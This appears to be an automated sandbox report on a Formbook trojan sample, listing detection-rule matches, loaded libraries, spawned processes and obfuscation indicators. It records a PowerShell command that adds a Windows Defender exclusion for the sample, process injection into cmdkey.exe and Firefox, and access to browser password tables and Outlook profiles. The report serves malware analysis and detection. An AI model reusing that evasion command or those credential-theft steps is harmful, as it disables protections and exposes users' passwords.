            Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: r9856_7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, yLcVqjAhUsybQFpIrK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csSecurity API names: _0020.AddAccessRule
            Source: NhrnLLOsLetD.exe, 0000000A.00000000.1611606614.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3816401592.00000000015E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
            Source: C:\Users\user\Desktop\r9856_7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\r9856_7.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
            Source: C:\Users\user\Desktop\r9856_7.exeMutant created: \Sessions\1\BaseNamedObjects\sRtztJgpshoJwYqdrdu
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw53lp0l.1lv.ps1
            Source: r9856_7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\r9856_7.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\r9856_7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: cmdkey.exe, 00000008.00000002.3814752917.000000000300D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1734763644.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3814752917.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1736190674.000000000300D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1736190674.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1734866064.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r9856_7.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: dwrite.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: textshaping.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: edputil.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: appresolver.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: slc.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\r9856_7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\r9856_7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: r9856_7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: r9856_7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: r9856_7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NhrnLLOsLetD.exe, 00000007.00000002.3815465692.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3815330168.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: cmdkey.pdbGCTL source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r9856_7.exe, r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: djdH.pdb source: r9856_7.exe
            Source: Binary string: cmdkey.pdb source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: djdH.pdbSHA256L source: r9856_7.exe

            Data Obfuscation

            Source: r9856_7.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 8.2.cmdkey.exe.3accd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.0.NhrnLLOsLetD.exe.335cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.2.NhrnLLOsLetD.exe.335cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.261acd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: r9856_7.exeStatic PE information: 0xD9557E98 [Wed Jul 18 01:40:40 2085 UTC]
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_02E75E0A pushfd ; iretd 0_2_02E75E19
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040C8B7 push ss; ret 4_2_0040C8BB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00417953 push eax; ret 4_2_0041798E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00414157 push ecx; ret 4_2_00414158
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_0041798A push eax; ret 4_2_0041798E
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_00406AF7 push es; iretd 4_2_00406AF9
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_0040D3D3 push edx; retf 4_2_0040D3E9
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_00415C31 pushfd; ret 4_2_00415C38
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_004034F0 push eax; ret 4_2_004034F2
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_004134B3 push 3ABD5B85h; ret 4_2_004134BE
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_00408717 push ecx; iretd 4_2_00408718
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_00411FB7 push eax; retf 4_2_00411FC8
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_010B225F pushad; ret 4_2_010B27F9
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_010B27FA pushad; ret 4_2_010B27F9
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_010E09AD push ecx; mov dword ptr [esp], ecx 4_2_010E09B6
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_010B283D push eax; iretd 4_2_010B2858
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_010B1366 push eax; iretd 4_2_010B1369
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_034D09AD push ecx; mov dword ptr [esp], ecx 8_2_034D09B6
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A14497 push eax; ret 8_2_00A1449B
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A14460 push eax; ret 8_2_00A1449B
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A2046E push ebx; iretd 8_2_00A20473
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A1E750 push ebp; retf 5D5Dh 8_2_00A1E821
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A0EAC4 push eax; retf 8_2_00A0EAD5
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A16F24 push edi; retf 8_2_00A16F25
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A05224 push ecx; iretd 8_2_00A05225
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A093C4 push ss; ret 8_2_00A093C8
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A23690 push FFFFFF83h; iretd 8_2_00A2370D
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A03604 push es; iretd 8_2_00A03606
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A1B8FA push eax; ret 8_2_00A1B8FB
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A0FFC0 push 3ABD5B85h; ret 8_2_00A0FFCB
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_033360BB push ecx; retf 8_2_033360DF
            Source: r9856_7.exe, Static PE information: section name: .text entropy: 7.8614274357019545
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, High entropy of concatenated method names
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, High entropy of concatenated method names
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, High entropy of concatenated method names

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\r9856_7.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
